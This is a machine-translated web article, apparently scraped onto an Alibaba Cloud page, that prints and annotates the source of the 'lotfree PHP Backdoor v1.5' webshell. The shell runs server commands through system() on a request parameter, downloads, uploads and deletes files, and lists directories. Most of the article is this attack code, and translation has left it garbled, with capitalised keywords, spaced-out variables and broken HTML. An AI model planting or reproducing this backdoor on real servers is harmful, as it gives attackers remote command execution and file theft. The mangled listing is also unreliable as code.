Explanation of PHP webshell files

Source: Internet
Author: User
Explanation of PHP webshell files

PHP Backdoor Version 1.5 is a php Backdoor program compiled by sirius_black/lotfree team. here, we will perform a simple analysis on it and take notes for learning php, the command executed by the backdoor depends on the user's permissions when installing the web server and php. if it is an administrator, various operating system commands can be executed.

Below is a comment on a backdoor program


  1. Function good_link ($ link)
  2. {
  3. $ Link = ereg_replace ("/+", "/", $ link );
  4. $ Link = ereg_replace ("/[^/(..)] +/\. \.", "/", $ link );
  5. $ Link = ereg_replace ("/+", "/", $ link );
  6. If (! Strncmp ($ link, "./", 2) & strlen ($ link)> 2) $ link = substr ($ link, 2 );
  7. If ($ link = "") $ link = ".";
  8. Return $ link;
  9. }
  10. // $ _ REQUEST is used to obtain the data submitted to this file.
  11. $ Dir = isset ($ _ REQUEST ['dir'])? $ _ REQUEST ['dir']: "."; // if no dir is defined, use the default value "."
  12. $ Dir = good_link ($ dir );
  13. $ Rep = opendir ($ dir); // open the path handle specified by dir
  14. Chdir ($ dir); // switch to the directory specified by dir
  15. If (isset ($ _ REQUEST ["down"]) & $ _ REQUEST ["down"]! = "") // If down is defined
  16. {
  17. Header ("Content-Type: application/octet-stream ");
  18. Header ("Content-Length:". filesize ($ _ REQUEST ["down"]);
  19. Header ("Content-Disposition: attachment; filename =". basename ($ _ REQUEST ["down"]);
  20. Readfile ($ _ REQUEST ["down"]); // read the file to the buffer zone
  21. Exit ();
  22. }
  23. ?>

  24. Lotfree php Backdoor v1.5, easy to trace yeetrack.com



  25. Echo "the current absolute path is:". Getcwd ()."
    \ N "; // Obtain the current absolute path
  26. Echo"Dir = '$ dir'
    \ N ";
  27. Echo "current directory, file list!

    \ N ";
  28. // If the command to be executed has been entered
  29. If (isset ($ _ REQUEST ['cmd']) & $ _ REQUEST ['cmd']! = "")
  30. {
  31. Echo"
    \ N ";
  32. System ($ _ REQUEST ['cmd']); // execute the entered command on the server and display the execution result
  33. Echo"
  34. \ N ";
  35. }
  36. // If a file has been uploaded
  37. If (isset ($ _ FILES ["fic"] ["name"]) & isset ($ _ POST ["MAX_FILE_SIZE"]) // Obtain The post file, save to current directory
  38. {
  39. If ($ _ FILES ["fic"] ["size"] <$ _ POST ["MAX_FILE_SIZE"]) // determines whether the file meets the size specifications
  40. {
  41. If (move_uploaded_file ($ _ FILES ["fic"] ["tmp_name"], good_link (". /". $ _ FILES ["fic"] ["name"]) // Save the temporary file to the current directory
  42. {
  43. Echo "the file is successfully saved". good_link ("./". $ _ FILES ["fic"] ["name"]). "!
    \ N ";
  44. }
  45. Else echo "file Upload failed:". $ _ FILES ["fic"] ["error"]."
    \ N ";
  46. }
  47. Else echo "File too large (the File size exceeds the limit )!
    \ N ";
  48. }
  49. If (isset ($ _ REQUEST ['rm ']) & $ _ REQUEST ['rm']! = "") // If rm is defined, the specified file is deleted.
  50. {
  51. If (unlink ($ _ REQUEST ['rm ']) // unlink is a php file deletion function.
  52. Echo "successfully deleted". $ _ REQUEST ['rm ']. "!
    \ N ";
  53. Else echo "failed to delete the file
    \ N ";
  54. }
  55. ?>





  56. $ T_dir = array ();
  57. $ T_file = array ();
  58. $ I _dir = 0;
  59. $ I _file = 0;
  60. // Input the directory file before reading it cyclically and place it in t_dir and t_file.
  61. While ($ x = readdir ($ rep ))
  62. {
  63. If (is_dir ($ x) // if the directory is currently being processed
  64. $ T_dir [$ I _dir ++] = $ x;
  65. Else // if the file is currently being processed
  66. $ T_file [$ I _file ++] = $ x;
  67. }
  68. Closedir ($ rep); // Close the directory handle opened by opendir
  69. While (1) // enter the directory and file of the current path in a loop
  70. {
  71. ?>

  72. // $ _ SERVER ['php _ SELF '] get the current PHP script file name
  73. If ($ y = each ($ t_file ))
  74. {
  75. If ($ y ["key"] % 2 = 0) // if the current processing is key
  76. Echo "bgcolor = 'lightgreen'> \ n ";
  77. Else // if the current process is value, that is, the file. This file is displayed and a download link is provided.
  78. Echo "> \ n ";
  79. Echo "". $ y ["value"]. "\ n ";
  80. }
  81. Else echo "> \ n ";
  82. ?>

  83. If ($ y)
  84. {
  85. // If it is a file, provide the following link to delete the file
  86. If ($ y ["key"] % 2 = 0) echo "bgcolor = 'lightgreen '";
  87. Echo ">Del";
  88. }
  89. Else echo "> \ n ";
  90. ?>

  91. If (! $ X &&! $ Y)
  92. Break;
  93. }
  94. ?>

  95. If ($ x = each ($ t_dir ))
  96. {
  97. $ Name = $ x ["value"]; // Obtain the directory name in the t_dir array
  98. If ($ name = '.'){}
  99. Elseif ($ name = '..') echo "UP (parent directory)

    \ N "; // displays an UP link to read the list of files in the parent directory.
  100. Else
  101. Echo "". $ name. "\ n ";
  102. }
  103. ?>




  104. ? Dir = "> revenirau repertoire d 'Origine





  105. Upload files to the current directory on the server:







Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.